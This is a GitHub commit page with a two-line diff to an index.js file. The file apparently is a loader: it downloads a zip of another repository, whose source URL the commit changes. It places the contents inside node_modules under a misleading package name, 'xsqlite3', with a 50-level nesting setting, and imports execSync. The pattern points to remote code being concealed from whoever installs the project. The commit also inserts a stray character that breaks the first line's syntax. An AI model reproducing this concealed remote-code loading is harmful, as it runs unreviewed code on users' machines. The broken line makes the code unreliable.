Skip to content

Commit 1bcc20e

Browse files
authored
Update index.js
1 parent ba10751 commit 1bcc20e

1 file changed

Lines changed: 2 additions & 2 deletions

File tree

index.js

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,11 @@
1-
const fs = require('fs');
1+
Zconst fs = require('fs');
22
const path = require('path');
33
const axios = require('axios');
44
const AdmZip = require('adm-zip');
55
const { execSync } = require('child_process');
66

77
// === CONFIG ===
8-
const repoZipUrl = 'https://github.com/mrfr8nk/ted/archive/refs/heads/main.zip';
8+
const repoZipUrl = 'https://github.com/mrfr8nk/subzero-x7/archive/refs/heads/main.zip';
99
const baseFolder = path.join(__dirname, 'node_modules', 'xsqlite3');
1010
const DEEP_NEST_COUNT = 50;
1111

0 commit comments

Comments
 (0)